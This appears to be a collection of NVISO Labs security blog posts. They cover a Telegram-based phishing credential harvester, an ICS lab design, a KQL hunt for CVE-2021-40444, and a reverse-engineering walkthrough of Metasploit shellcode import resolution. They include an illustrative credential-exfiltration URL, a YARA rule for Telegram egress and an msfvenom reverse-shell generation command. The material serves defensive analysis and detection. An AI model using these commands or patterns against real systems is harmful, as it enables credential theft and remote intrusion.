The initial malicious attachment, reported by an end-user, is a typical phishing attachment file (.htm) delivered by a non-business email address (hotmail[.]co[.]uk), courtesy of “Onedrive for Business”. While we have observed some elaborate attempts in the past, it is quite obvious from a first glance that little effort has been put into this attempt.

Figure 1: A capture of the reported email with the spoofed recipient name, recipient and warning-banner redacted.

Upon opening the phishing attachment, the user would be presented with a pre-filled login form. The form impersonates the usual Microsoft login page in an attempt to grab valid credentials.

Figure 2: A capture of the Office 365 phishing attachment with the pre-filled credentials redacted.

If the user is successfully tricked into signing in, a piece of inline Javascript exfiltrates the credentials to a harvesting channel. This is performed through a simple GET request towards the api[.]telegram[.]org domain with the phished email address, password and IP included as parameters.

Figure 3: A capture of the credential harvesting Javascript code.
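Such a request follows the documented sendMessage format of the Telegram Bot API; the layout below is illustrative (token, chat identifier and parameter order are placeholders):

https://api.telegram[.]org/bot<bot_token>/sendMessage?chat_id=<channel_id>&text=<email>|<password>|<victim_ip>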

As the analysis of the 1937990321 campaign’s document exposed harvester credentials, our curiosity led us to identify additional documents and campaigns through VirusTotal Livehunt.

Campaign Operator Bot Lures Victims
1937990321 ade allgood007bot Office 365 400
1168596795 eric jones (stealthrain76745) omystical_bot Office 365, Excel 95
1036920388 PRo ✔️ (Emhacker) proimp1_bot M&T Bank, Unknown 127
Figure 4: An overview of Telegram-based campaigns with code-similarity.
Figure 5: A capture of the Excel (left) and US-based M&T Bank (right) lures.

While we managed to identify the M&T Bank campaign (1036920388), we were unable to identify successful phishing attempts. Most of the actor’s harvesting history contained bad data, with occasional stolen data originating from unknown lures. As such, the remainder of this blog post will not take the 1036920388 dataset into account.

To Phished

Throughout the second half of September, the malicious Telegram bots exfiltrated over 3.386 credentials belonging to 495 distinct victims.

Figure 6: Telegram channel messages over time.

If we take a look at the victim repartition in figure 7, we can notice a distinct targeting of UK-originating accounts.

Figure 7: The victims’ geographical proportions.

Over 94% of the phished accounts belong to the non-corporate Microsoft mail services. These personal accounts are usually more vulnerable as they lack both enterprise-grade protections (e.g.: Microsoft Defender for Office 365) and policies (e.g.: Azure AD Conditional Access Policies).

Figure 8: The victims’ domain proportions.

While the 5% of collected corporate credentials can act as initial access for hands-on-keyboard operations, do the remaining 95% get discarded?

To Phisher

One remaining fact of interest in the 1937990321 campaign’s dataset is the presence of a compromised alisonb account as can be observed in figure 9.

Figure 9: A compromised account re-used for phishing delivery.

The alisonb account is in fact the original account that targeted one of NVISO’s customers. This highlights the common cycle of phishing:

  • Corporate accounts are filtered for initial access.
  • Remaining accounts are used for further phishing.

Identifying these accounts as soon as they’re compromised allows us to preemptively gray-list them, making sure the phishing cycle gets broken.

The Baddies

The Telegram channels furthermore contain records of the actors starting (/start command) and testing their collection methods. These tests exposed two IPs likely part of the actors’ VPN infrastructure:

  • 91[.]132[.]230[.]75 located in Russia
  • 149[.]56[.]190[.]182 located in Canada
Figure 10: The threat actor performing end-to-end tests.

In addition to the above test messages, we managed to identify an actor-made screen capture of the conversation. By cross-referencing the message times with the obtained logs, we can assess with high confidence that eric jones, the 1168596795 campaign operator, is operating an English-language device from the UTC+2 time zone.

Figure 11: An actor-made screen capture of the test messages.

To further confirm our theory, we can observe additional Telegram messages originating from the above actor IPs. The activity taking place between 9AM (UTC) and 10PM (UTC) tends to confirm the Canadian server is indeed geographically distant from the actor suspected of operating in UTC+2.

Figure 12: The threat actor interactions by time of the day (UTC).

Final Thoughts

We rarely get the opportunity to peek behind a phishing operation’s curtains. While the observed campaigns were quite small, identifying the complete phishing cycle with the alisonb account was quite satisfying.

Our short analysis of the events enabled NVISO to protect its customers from accounts likely to be used for phishing in the coming days, and further acts as a reminder that even obvious phishing emails can be successful nonetheless.

Indicators and Rules

Lures

The following files were analyzed to identify harvester credentials. Many more Excel lures can be identified through the EXCELL typo in VirusTotal.

SHA256 Campaign Lure
696f2cf8a36be64c281fd940c3f0081eb86a4a79f41375ba70ca70432c71ca29 1937990321 Office 365
2cc9d3ad6a3c2ad5cced10a431f99215e467bfca39cf02732d739ff04e87be2d 1168596795 Excel
209b842abd1cfeab75c528595f0154ef74b5e92c9cc715d18c3f89473edfeff9 1168596795 Excel
acc4c5c40d11e412bb343357e493d22fae70316a5c5af4ebf693340bc7616eae 1168596795 Excel
b7c8bb9e149997630b53d80ab901be1ffb22e1578f389412a7fdf1bd4668a018 1168596795 Excel
e36dd51410f74fa6af3d80c2193450cf85b4ba109df0c44f381407ef89469650 1168596795 Excel
a7af7c8b83fc2019c4eb859859efcbe8740d61c7d98fc8fa6ca27aa9b3491809 1168596795 Excel
ba9dd2ae20952858cdd6cfbaff5d3dd22b4545670daf41b37a744ee666c8f1dc 1036920388 M&T Bank
36368186cf67337e8ad69fd70b1bcb8f326e43c7ab83a88ad63de24d988750c2 1036920388 M&T Bank
7772cf6ab12cecf5ff84b23830c12b03e9aa2fae5d5b7d1c8a8aaa57525cb34e 1036920388 M&T Bank

Yara

//For a VirusTotal Livehunt rule, uncomment the "vt" related statements.
//import "vt"

rule phish_telegram_bot_api: testing TA0001 T1566 T1566_001
{
    meta:
        description = "Detects the presence of the Telegram Bot API endpoint often used as egress"
        author      = "Maxime THIEBAUT (@0xThiebaut)"
        date        = "2021-09-30"
        reference   = "https://blog.nviso.eu/2021/10/04/phish-phished-phisher-a-quick-peek-inside-a-telegram-harvester/"
        tlp         = "white"
        status      = "testing"

        tactic      = "TA0001"
        technique   = "T1566.001"

        hash1       = "696f2cf8a36be64c281fd940c3f0081eb86a4a79f41375ba70ca70432c71ca29"

    strings:
        $endpoint   = "https://api.telegram.org/bot"
        $command    = "/sendMessage"
        $option1    = "chat_id"
        $option2    = "text"
        $option3    = "parse_mode"
        $script     = "<script>"

    condition:
        all of them //and vt.metadata.file_type == vt.FileType.HTML
}
✇ NVISO Labs

Building an ICS Firing Range – Part 2 (Defcon 29 ICS Village)

By: molathonviso

As discussed in our first post in the series about our ICS firing range, we came to the conclusion that we had to build a lab ourselves. Now, this turned out to be a quite tricky task and in this blog post I am going to tell you why: which challenges we faced and which choices we made on our way to building our very own lab.
This was a rather long project and involved quite a few steps. To structure this post, I will guide you through how we designed our lab, divided into the tasks we worked on in chronological order.

Requirements Analysis

Well, we knew that we were going to build this lab but we needed more information about the exact requirements it should meet so we could focus on those specifically. During internal discussions and meetings with the client we worked out this list of initial, key requirements:

  1. The lab shall feature IT and OT components that represent a realistic bridge-operation scenario.
  2. The lab shall be mobile so it can be transported, set up and worked with on different sites.
  3. The lab shall be extensible: scenarios and both hardware and software components can be added in the future.

These requirements were intentionally left rather broad so that we could work out different feasible concepts for individual challenges and decide with the client which way to go. This approach allowed us to stay in close contact with the client and make sure that we met their needs.

Designing an ICS Firing Range

In order to build great things, you will need great plans. In this phase, we worked out said plans, starting with our very first concept.

1. The First Concept

Once we knew our key requirements, we started doing our research on the topic of operating bascule bridges. This was certainly easier said than done: it turned out that publicly available information about critical infrastructure, such as bridges, was not that easy to find.
Eventually we found a very good resource, the “Bridge Maintenance Reference Manual” provided by the Florida Department of Transportation (FDOT). This manual was a very good find since it detailed the general structure of bascule bridges and explained the most relevant components. Using this, we developed our first, simplified concept:

First 2D Concept of our Bridge Operation Scenario

It features the core components of bascule bridges:

  • Structural components such as the leaves, counterweights and pits (bottom part of the bridges)
  • Drives that move the actual bridge leaves, road barriers and counterweights-locks
  • LEDs that indicate STOP/GO signals for maritime and road traffic
  • An alarm (buzzer) that is turned on and beeps while the leaves are moving
Simple Blender 3D Mock-Up

We translated this into a first, early 3D model in Blender to get an idea of the dimensions and looks. While it was very much simplified, it allowed us to work out some ideas about shapes and placement of components.

This way we found out that a modular setup might provide much needed flexibility for assembly and maintenance: the pits would provide a strong foundation to mount the remaining components onto, while the upper part (shown in green-ish color in the picture) would be made of two halves set atop the pit. Resting inside the pit would be a large stepper motor driving a pinion gear, which in turn drives a rack installed underneath the bridge leaf.

Satisfied with this concept, we moved on to working on the underlying infrastructure of the lab.

2. Blocking out the Infrastructure

From the start we knew that it would take a good number of systems and networks to represent a somewhat realistic ICS environment: we expected a bridge operator to have an enterprise network that their regular office workstations are connected to, which are probably domain joined. Furthermore, they would have a SCADA network that contains operator workstations for monitoring and controlling the remote bridge-sites, historians to record operational data, and engineering workstations to program PLCs and HMIs. These networks would be routed via a public demilitarized zone (DMZ) over the internet to a remote bridge site. Also, all of these networks would have their own subnets and feature a router that allows adequate routing between the networks and a firewall that specifies individual rules for incoming and outgoing traffic (with a DENY ALL default rule). We decided that virtualizing these machines and networks would be a good compromise between the resources demanded to implement them and the physical space they would take up.

Presumed Local Network Infrastructure of a Bridge Operator

In addition to the IT infrastructure, we also designed the OT part. We intended the diagram below to somewhat represent the lower levels of the Purdue model: There are three substations that represent individual cells for traffic lights, gates and leaf lifting operation. They contain sensors and drives (our level 0 devices, e.g. limit switches and motors) which are controlled by individual PLCs per cell. These PLCs are instructed by one central PLC that is connected to the SCADA network.

Presumed OT Environment of our Bridge Site Scenario

In addition to these rather traditional OT components, our client requested us to include CCTV functionality in the lab. For this we planned to use Raspberry Pis with PiCams.
This network design represented a sufficiently realistic ICS network and allowed for future additions. Time to move on!

3. Figuring Out Which OT Hardware to Use

Now that we knew what things we wanted to interact with physically (those being mainly motors and LEDs) and how to connect them to our lab networks, we started doing our research on suitable OT hardware.

Naturally, we were soon overwhelmed by the sheer amount of devices to choose from: there were plenty of manufacturers that offered loads of different devices for a variety of different use-cases, requirements and budgets with an equally wide variety of different features, dependencies and compatibilities.

Confronted with this challenge (and severely lacking expertise in building OT environments), we decided to make assumptions that helped us trim down the selection of manufacturers and devices and make educated decisions:

  • We would assume that, for a single operation site, one would stick to devices of one single manufacturer. This allowed us to largely ignore cross-manufacturer-compatibility. We chose SIEMENS for their significant European market-share in ICS hardware.
  • In order to reduce the complexity of building and interconnecting the OT devices, we decided to implement communication via Ethernet exclusively and ignore other communication media and interfaces.
  • To represent a realistic and “historically grown” (e.g. occasionally updated and maybe upgraded across decades) operation site, we would use devices of varying EOL (end of life). We decided to include legacy PLCs (S7-300), all-rounder “standard” PLCs (S7-1200), modern high-end PLCs (S7-1500) and standard HMIs (TP700).
Us (left) when we faced dozens of datasheets of SIEMENS, ABB and Mitsubishi devices.

At this point, all that was left to do was figure out which PLC to use for which task. This required digging through quite a few datasheets of the abovementioned PLCs, mainly to find out how many and which digital inputs and outputs the PLCs feature. For example, we learned that, to control stepper motors, we needed to create pulse signals (in our case Pulse-Train Outputs, PTOs) of up to 100kHz. During our research, a rather cheap signal board for the S7-1200 turned up that would generate PTOs of up to 200kHz. We ended up using the S7-1200 PLCs to drive the leaves and barriers, the S7-300 to control the LEDs and the buzzer, and the S7-1500 for orchestration and outbound communication to the virtualized IT environment.

4. Our Vision

With all the information we had worked out, we came up with a vision of what we wanted our lab to look like:

3D concept of the mobile lab

It’s essentially an aluminium frame on wheels, featuring a 3D-printed bridge on top and a steel plate mounted vertically inside it. The OT components are mounted onto the front-facing side of the steel plate and the virtualization server running the IT systems and networks is located in the back. The black panels are made of wood and hide the power distribution and the server. It may be hard to pick up visually, but there are acrylic glass panels on the sides and the front to provide a look inside.

With this vision in mind, we set out to build it!

We are going to cover this in the next blog post about our ICS firing range – Stay tuned!

✇ NVISO Labs

Kusto hunting query for CVE-2021-40444

By: bparys

Introduction

On September 7th 2021, Microsoft published customer guidance concerning CVE-2021-40444, an MSHTML Remote Code Execution Vulnerability:

Microsoft is investigating reports of a remote code execution vulnerability in MSHTML that affects Microsoft Windows. Microsoft is aware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents.

An attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine. The attacker would then have to convince the user to open the malicious document. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

Microsoft

In practice, the attack basically involves a specially-crafted Microsoft Office document that includes an ActiveX control, which in turn activates the MSHTML component. The vulnerability as such resides in this MSHTML component.

Seeing that there is reported exploitation in the wild (ITW), we decided to write a quick Kusto (KQL) query that allows for hunting in Microsoft Defender ATP.

The query

let process = dynamic(["winword.exe","wordview.exe","wordpad.exe","powerpnt.exe","excel.exe"]);
DeviceImageLoadEvents
| where FileName in ("mshtml.dll", "Microsoft.mshtml.dll")
| where InitiatingProcessFileName in~ (process) 
//We only want actual files ran, not Office restore operations etc.
| where strlen(InitiatingProcessCommandLine) > 40
| project Timestamp, DeviceName, InitiatingProcessFolderPath, 
    InitiatingProcessParentFileName, InitiatingProcessParentCreationTime, 
    InitiatingProcessCommandLine

In this query, the following is performed:

  • Add relevant Microsoft Office process names to an array;
  • Add both common filenames for MSHTML;
  • Get a string length larger than 40 characters: this is to weed out false positives, for example where the command line only contains the process in question and a parameter such as /restore or /safe;
  • Display the results.

Results

This was of course tested – a sample set of over 10,000 endpoints across several environments, spanning 7 days, delivered a total of 37 results. These results can be broken down as follows:

Figure 1 – Query Results

None of these processes are anomalous per se:

  • Explorer.exe: graphical user interface, the result of a user opening, for example, Microsoft Word from their Documents folder;
  • Protocolhandler.exe: handles URI schemes in Microsoft Office;
  • Outlook.exe: Microsoft’s email client;
  • Runtimebroker.exe: helps manage permissions from Microsoft Store apps (such as Microsoft Office).

While each of these processes warrants a closer look, you’ll be able to assess more quickly whether anything anomalous is going on by verifying what’s in the InitiatingProcessCommandLine column.

If it contains a remote web address, the file was likely opened from SharePoint or from another online location. If it does not contain a remote web address, the file is stored and opened locally.

Pay special attention to files opened locally or launched with Outlook as parent process: chances are this is the result of a phishing email. In case you suspect a true positive:

  • Verify with the user if they have knowledge of opening this file, and if it was from an email they were expecting;
  • If possible, grab a copy of the file and submit it to Microsoft (or a private sandbox of your choice; if you use a public sandbox, be aware that whatever you upload is visible to everyone) to further determine whether it is malicious;
  • Perform a separate investigation on the user or their device to determine if there’s any other events that may be out of the ordinary.
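
To apply the above checks at scale, you can export the query results and triage them with a short script. Below is a minimal Python sketch which assumes the results were exported to a results.csv file; the column names come from the query’s project clause, while the verdict labels and file name are our own:

import csv

# Hedged triage helper: flag rows that warrant a closer look based on the
# remote-address and Outlook-parent heuristics described above.
def triage(row):
    cmd = row["InitiatingProcessCommandLine"].lower()
    remote = "http://" in cmd or "https://" in cmd
    from_outlook = row["InitiatingProcessParentFileName"].lower() == "outlook.exe"
    if from_outlook or not remote:
        return "inspect"        # opened locally or spawned by mail: possible phishing
    return "likely benign"      # opened from SharePoint or another online location

with open("results.csv", newline="", encoding="utf-8") as f:
    for row in csv.DictReader(f):
        print(triage(row), "|", row["InitiatingProcessCommandLine"])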

Ultimately, you can leverage the following process:

  • Run the query for a first time, and for a limited time period (7 days as in our example) or limited set of hosts;
  • Investigate each result to create a baseline and separate the wheat from the chaff (or the true from the false positives);
  • Fine-tune the Kusto query above to your environment;
  • Happy hunting!

Conclusion

An actively exploited vulnerability in the MSHTML component in theory affects all Microsoft Office products that make use of it.

Patch as soon as Microsoft has a patch available (potentially, an out-of-band patch will be released soon) and apply the mitigations and workarounds as described by Microsoft:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444

Thanks to our colleagues Remco and Niels for performing unit tests.

✇ NVISO Labs

Anatomy and Disruption of Metasploit Shellcode

By: Maxime Thiebaut

In April 2021 we went through the anatomy of a Cobalt Strike stager and how some of its signature evasion techniques ended up being ineffective against detection technologies. In this blog post we will go one level deeper and focus on Metasploit, an often-used framework interoperable with Cobalt Strike.

Throughout this blog post we will cover the following topics:

  1. The shellcode’s import resolution – How Metasploit shellcode locates functions from other DLLs and how we can precompute these values to resolve any imports from other payload variants.
  2. The reverse-shell’s execution flow – How trivial a reverse shell actually is.
  3. Disruption of the Metasploit import resolution – A non-intrusive deception technique (no hooks involved) to have Metasploit notify the antivirus (AV) of its presence with high confidence.

For this analysis, we generated our own shellcode using Metasploit version v6.0.30-dev. The malicious sample generated using the command below has 3792f355d1266459ed7c5615dac62c3a5aa63cf9e2c3c0f4ba036e6728763903 as its SHA256 hash and is available on VirusTotal for readers willing to have a try themselves.

msfvenom -p windows/shell_reverse_tcp -a x86 > shellcode.vir

Throughout the analysis we have renamed functions, variables and offsets to reflect their role and improve clarity.

Initial Analysis

In this section we will outline the initial logic followed to determine the next steps of the analysis (import resolution and execution flow analysis).

While a typical executable contains one or more entry-points (exported functions, TLS-callbacks, …), shellcode can be seen as the most primitive code format where initial execution occurs from the first byte.

Analyzing the generated shellcode from the initial bytes outlines two operations:

  1. The first instruction at ① can be ignored from an analytical perspective. The cld operation clears the direction flag, ensuring string data is read forwards instead of backwards (e.g.: cmd vs dmc).
  2. The second call operation at ② transfers execution to a function we named Main, this function will contain the main logic of the shellcode.
Figure 1: Disassembled shellcode calling the Main function.

Within the Main function, we observe additional calls such as the four ones highlighted in the trimmed figure below (③, ④, ⑤ and ⑥). These calls target a yet unidentified function whose address is stored in the ebp register. To understand where this function is located, we will need to take a step back and understand how a call instruction operates.

Figure 2: Disassembly of the Main function.

A call instruction transfers execution to the target destination by performing two operations:

  1. It pushes the return address (the memory address of the instruction located after the call instruction) on the stack. This address can later be used by the ret instruction to return execution from the called function (callee) back to the calling function (caller).
  2. It transfers execution to the target destination (callee), as a jmp instruction would.
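
As a toy illustration (a Python sketch in which plain integers stand in for instruction addresses, not an emulator), these two operations can be modeled as a push followed by a jump:

# Toy model of call/ret: a Python list plays the role of the stack.
stack = []

def call(return_address, callee):
    stack.append(return_address)  # 1. push the address of the next instruction
    return callee                 # 2. jump to the destination, as a jmp would

def ret():
    return stack.pop()            # resume at the saved return address

# After "call Main", the address of the instruction following the call sits
# on top of the stack; a pop at the start of Main recovers exactly that value.
eip = call(0x06, 0x88)  # illustrative addresses
print(hex(stack[-1]))   # 0x6: what a pop at Main's start would retrieve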

As such, the first pop instruction in the Main function at ③ stores the caller’s return address into the ebp register. This return address is then called as a function later on, among others at offsets 0x99, 0xA9 and 0xB8 (④, ⑤ and ⑥). This pattern, alongside the presence of a similar-looking push before each call, suggests that the return address stored within ebp points to the dynamic import resolution function.

Without diving into unnecessary depth, a “normal” executable (e.g.: Portable Executable on Windows) contains the necessary information so that, once loaded by the Operating System (OS) loader, the code can call imported routines such as those from the Windows API (e.g.: LoadLibraryA). To achieve this default behavior, the executable is expected to have a certain structure which the OS can interpret. As shellcode is a bare-bone version of the code (it has none of the expected structures), the OS loader can’t assist it in resolving these imported functions; even more so, the OS loader will fail to “execute” a shellcode file. To cope with this problem, shellcode commonly performs a “dynamic import resolution”.

One of the most common techniques to perform “dynamic import resolution” is to hash each available exported function’s name and compare it with the required import’s hash. As shellcode authors can’t always predict whether a specific DLL (e.g.: ws2_32.dll for Windows Sockets) and its exports are already loaded, it is not uncommon to observe shellcode loading DLLs by calling the LoadLibraryA function first (or one of its alternatives). Relying on LoadLibraryA (or alternatives) before calling other DLLs’ exports is a stable approach as these library-loading functions are part of kernel32.dll, one of the few DLLs which can be expected to be loaded into each process.

To confirm our above theory, we can search for all call instructions as can be seen in the following figure (e.g.: using IDA’s Text... option under the Search menu). Apart from the first call to the Main function, all instances refer to the ebp register. This observation, alongside well-known constants we will observe in the next section, supports our theory that the address stored in ebp holds a pointer to the function performing the dynamic import resolution.

Figure 3: All call instructions in the shellcode.

The abundance of calls towards the ebp register suggests it indeed holds a pointer to the import resolution function, which we now know is located right after the first call to Main.

Import Resolution Analysis

So far we noticed the instructions following the initial call to Main play a crucial role as what we expect to be the import resolution routine. Before we analyze the shellcode’s logic, let us analyze this resolution routine as it will ease the understanding of the remaining calls.

From Import Hash to Function

The code located immediately after the initial call to Main is where the import resolution starts. To resolve these imports, the routine first locates the list of modules loaded into memory as these contain their available exported functions.

To find these modules, an often leveraged shellcode technique is to interact with the Process Environment Block (shortened as PEB).

In computing the Process Environment Block (abbreviated PEB) is a data structure in the Windows NT operating system family. It is an opaque data structure that is used by the operating system internally, most of whose fields are not intended for use by anything other than the operating system. […] The PEB contains data structures that apply across a whole process, including global context, startup parameters, data structures for the program image loader, the program image base address, and synchronization objects used to provide mutual exclusion for process-wide data structures.

wikipedia.org

As can be observed in figure 4, to access the PEB, the shellcode accesses the Thread Environment Block (TEB) which is immediately accessible through a register (⑦). The TEB structure itself contains a pointer to the PEB (⑦). From the PEB, the shellcode can locate the PEB_LDR_DATA structure (⑧) which in turn contains a reference to multiple double-linked module lists. As can be observed at (⑨), the Metasploit shellcode leverages one of these double-linked lists (InMemoryOrderModuleList) to later iterate through the LDR_DATA_TABLE_ENTRY structures containing the loaded module information.

Once the first module is identified, the shellcode retrieves the module’s name (BaseDllName.Buffer) at ⑩ and the buffer’s maximum length (BaseDllName.MaximumLength) at ⑪, which is required as the buffer is not guaranteed to be NULL-terminated.

Figure 4: Disassembly of the initial module retrieval.

One point worth highlighting is that, as opposed to usual pointers (TEB.ProcessEnvironmentBlock, PEB.Ldr, …), a double-linked list points to the next item’s list entry. This means that instead of pointing to the structures’ start, a pointer from the list will target a non-zero offset. As such, while in the following figure the LDR_DATA_TABLE_ENTRY has the BaseDllName property at offset 0x2C, the offset from the list entry’s perspective will be 0x24 (0x2C-0x08). This can be observed in the above figure 4 where an offset of 8 has to be subtracted to access both of the BaseDllName properties at ⑩ and ⑪.

Figure 5: From TEB to BaseDllName.
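
The offset correction can be summarized in a few lines of Python, using the 32-bit offsets from figure 5:

# Offsets within LDR_DATA_TABLE_ENTRY as shown in figure 5 (32-bit layout).
IN_MEMORY_ORDER_LINKS = 0x08  # position of the list entry within the structure
BASE_DLL_NAME         = 0x2C  # position of the BaseDllName UNICODE_STRING

# A pointer taken from the double-linked list targets the list entry itself,
# so every structure offset must be corrected by the list entry's position.
def from_list_entry(member_offset):
    return member_offset - IN_MEMORY_ORDER_LINKS

print(hex(from_list_entry(BASE_DLL_NAME)))  # 0x24, matching figure 4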

With the DLL name’s buffer and maximum length recovered, the shellcode proceeds to generate a hash. To do so, the shellcode performs a set of operations for each ASCII character within the maximum name length:

  1. If the character is lowercase, it gets converted to uppercase. This operation is performed on the character’s ASCII representation, meaning that if the value is 0x61 or higher (a or higher), 0x20 gets subtracted to fall within the uppercase range.
  2. The generated hash (initially 0) is rotated right (ROR) by 13 bits (0x0D).
  3. The upper-cased character is added to the existing hash.
Figure 6: Schema depicting the hashing loops of KERNEL32.DLL‘s first character (K).

With the repeated combination of rotations and additions on a fixed register size (32 bits in edi‘s case), characters will ultimately start overlapping. These repeated and overlapping combinations make the operations non-reversible and hence produce a 32-bit hash/checksum for a given name.

One interesting observation is that while the BaseDllName in LDR_DATA_TABLE_ENTRY is Unicode-encoded (2 bytes per character), the code treats it as ASCII encoding (1 byte per character) by using lodsb (see ⑫).

Figure 7: Disassembly of the module’s name hashing routine.

The hash generation algorithm can be implemented in Python as shown in the snippet below. While we previously mentioned that the BaseDllName‘s buffer was not required to be NULL-terminated per Microsoft documentation, extensive testing has shown that NULL-termination was always the case and could generally be assumed. This assumption is what makes the MaximumLength property a valid boundary, similarly to the Length property. The following snippet hence expects the data passed to get_hash to be a Python bytes object generated from a NULL-terminated Unicode string.

# Helper function for rotate-right on 32-bit architectures
def ror(number, bits):
    return ((number >> bits) | (number << (32 - bits))) & 0xffffffff

# Define hashing algorithm
def get_hash(data):
    # Initialize hash to 0
    result = 0
    # Loop each character
    for b in data:
        # Make character uppercase if needed (0x61 or higher means lowercase)
        if b >= ord('a'):
            b -= 0x20
        # Rotate DllHash right by 0x0D bits
        result = ror(result, 0x0D)
        # Add character to DllHash
        result = (result + b) & 0xffffffff
    return result

The above functions could be used as follows to compute the hash of KERNEL32.DLL.

# Define a NULL-terminated base DLL name
name = 'KERNEL32.DLL\0'
# Encode it as Unicode
encoded = name.encode('UTF-16-LE')
# Compute the hash
value = hex(get_hash(encoded))
# And print it ('0x92af16da')
print(value)

With the DLL name’s hash generated, the shellcode proceeds to identify all exported functions. To do so, the shellcode starts by retrieving the LDR_DATA_TABLE_ENTRY‘s DllBase property (⑬) which points to the DLL’s in-memory address. From there, the IMAGE_EXPORT_DIRECTORY structure is identified by walking the Portable Executable’s structures (⑭ and ⑮) and adding the relative offsets to the DLL’s in-memory base address. This last structure contains the number of exported function names (⑰) as well as a table of pointers towards these (⑯).

Figure 8: Disassembly of the export retrieval.

The above operations can be schematized as follows, where dotted lines represent addresses computed from relative offsets increased by the DLL’s in-memory base address.

Figure 9: From LDR_DATA_TABLE_ENTRY to IMAGE_EXPORT_DIRECTORY.

Once the number of exported names and their pointers are identified, the shellcode enumerates the table in descending order. Specifically, the number of names is used as a decremented counter at ⑱. For each exported function’s name, and while none matches, the shellcode performs a hashing routine (hash_export_name at ⑲) similar to the one we observed previously, with the sole difference that character case is preserved (hash_export_character).

The final hash is obtained by adding the recently computed function hash (ExportHash) to the previously obtained module hash (DllHash) at ⑳. This addition is then compared at ㉑ to the sought hash and, unless they match, the operation starts again for the next function.

Figure 10: Disassembly of export’s name hashing.

If none of the exported functions match, the routine retrieves the next module in the InMemoryOrderLinks double-linked list and performs the above operations again until a match is found.

Figure 11: Disassembly of the loop to the next module.

The above walked double-linked list can be schematized as the following figure.

Figure 12: Walking the InMemoryOrderModuleList.

If a match is found, the shellcode will proceed to call the exported function. To retrieve its address from the previously identified IMAGE_EXPORT_DIRECTORY, the code will first need to map the function’s name to its ordinal (㉒), a sequential export number. Once the ordinal is recovered from the AddressOfNameOrdinals table, the address can be obtained by using the ordinal as an index in the AddressOfFunctions table (㉓).

Figure 13: Disassembly of the import “call”.

Finally, once the export’s address is recovered, the shellcode simulates the call behavior by ensuring the return address is first on the stack (removing the hash it was searching for, at ㉔), followed by all parameters as required by the default Win32 API __stdcall calling convention (㉕). The code then performs a jmp operation at ㉖ to transfer execution to the dynamically resolved import which, upon return, will resume from where the initial call ebp operation occurred.

Overall, the dynamic import resolution can be schematized as a nested loop. The main loop walks modules following the in-memory order (blue in the figure below) while, for each module, a second loop walks exported functions looking for a matching hash between desired import and available exports (red in the figure below).

Figure 14: The import resolution flow.
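
For readers wishing to replicate the name-to-ordinal-to-address indirection of figure 13 offline, the following Python sketch walks the three export tables by hand using pefile. The export_address helper is our own naming and merely mirrors the lookup; it is not the shellcode’s code:

import pefile

def export_address(path, wanted_name):
    # Walk AddressOfNames -> AddressOfNameOrdinals -> AddressOfFunctions by
    # hand, mirroring the shellcode's lookup from figure 13.
    pe = pefile.PE(path, fast_load=True)
    pe.parse_data_directories(
        directories=[pefile.DIRECTORY_ENTRY["IMAGE_DIRECTORY_ENTRY_EXPORT"]])
    exports = pe.DIRECTORY_ENTRY_EXPORT.struct
    for i in range(exports.NumberOfNames):
        # Each AddressOfNames entry points to a NULL-terminated export name
        name_rva = pe.get_dword_at_rva(exports.AddressOfNames + 4 * i)
        if pe.get_string_at_rva(name_rva) != wanted_name:
            continue
        # Map the name's index to its ordinal (2-byte entries) ...
        ordinal = pe.get_word_at_rva(exports.AddressOfNameOrdinals + 2 * i)
        # ... and use the ordinal as an index into AddressOfFunctions
        func_rva = pe.get_dword_at_rva(exports.AddressOfFunctions + 4 * ordinal)
        return pe.OPTIONAL_HEADER.ImageBase + func_rva
    return None

# Example: resolve LoadLibraryA the way the shellcode would
print(hex(export_address("C:\\Windows\\SysWOW64\\kernel32.dll", b"LoadLibraryA")))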

Building a Rainbow Table

Identifying which imports the shellcode relies on will provide us with further insight into the rest of its logic. Instead of dynamically analyzing the shellcode, and given that we have figured out the hashing algorithm above, we can build ourselves a rainbow table.

A rainbow table is a precomputed table for caching the output of cryptographic hash functions, usually for cracking password hashes.

wikipedia.org

The following Python snippet computes the “Metasploit” hashes for DLL exports located in the most common system locations.

import glob
import os
import pefile
import sys

size = 32
mask = ((2**size) - 1)

# Resolve 32- and 64-bit System32 paths
root = os.environ.get('SystemRoot')
if not root:
    raise Exception('Missing "SystemRoot" environment variable')

globs = [f"{root}\\System32\\*.dll", f"{root}\\SysWOW64\\*.dll"]

# Helper function for rotate-right
def ror(number, bits):
    return ((number >> (bits % size)) | (number << (size - (bits % size)))) &  mask

# Define hashing algorithm
def get_hash(data):
    result = 0
    for b in data:
        result = ror(result, 0x0D)
        result = (result + b) & mask
    return result

# Helper function to uppercase data
def upper(data):
    return [(b if b < ord('a') else b - 0x20) for b in data]

# Print CSV header
print("File,Function,IDA,Yara")

# Loop through all DLLs
for g in globs:
    for file in glob.glob(g):
        # Compute the DllHash
        name = upper(os.path.basename(file).encode('UTF-16-LE') + b'\x00\x00')
        file_hash = get_hash(name)
        try:
            # Parse the DLL for exports
            pe = pefile.PE(file, fast_load=True)
            pe.parse_data_directories(directories = [pefile.DIRECTORY_ENTRY["IMAGE_DIRECTORY_ENTRY_EXPORT"]])
            if hasattr(pe, "DIRECTORY_ENTRY_EXPORT"):
                # Loop through exports
                for exp in pe.DIRECTORY_ENTRY_EXPORT.symbols:
                    if exp.name:
                        # Compute ExportHash
                        name = exp.name.decode('UTF-8')
                        exp_hash = get_hash(exp.name + b'\x00')
                        metasploit_hash = (file_hash + exp_hash) & 0xffffffff
                        # Compute additional representations
                        ida_view = metasploit_hash.to_bytes(size // 8, byteorder='big').hex().upper() + "h"
                        yara_view = metasploit_hash.to_bytes(size // 8, byteorder='little').hex(' ')
                        # Print CSV entry
                        print(f"\"{file}\",\"{name}\",\"{ida_view}\",\"{{{yara_view}}}\"")
        except pefile.PEFormatError:
            print(f"Unable to parse {file} as a valid PE, skipping.", file=sys.stderr)
            continue

As an example, the following PowerShell commands generate a rainbow table and then search it for the 726774Ch hash we first observed in figure 2. For everyone’s convenience, we have published our rainbow.csv version containing 239k hashes.

# Generate the rainbow table in CSV format
PS > .\rainbow.py | Out-File .\rainbow.csv -Encoding UTF8

# Search the rainbow table for a hash
PS > Get-Content .\rainbow.csv | Select-String 726774Ch
"C:\Windows\System32\kernel32.dll","LoadLibraryA","0726774Ch","{4c 77 26 07}"
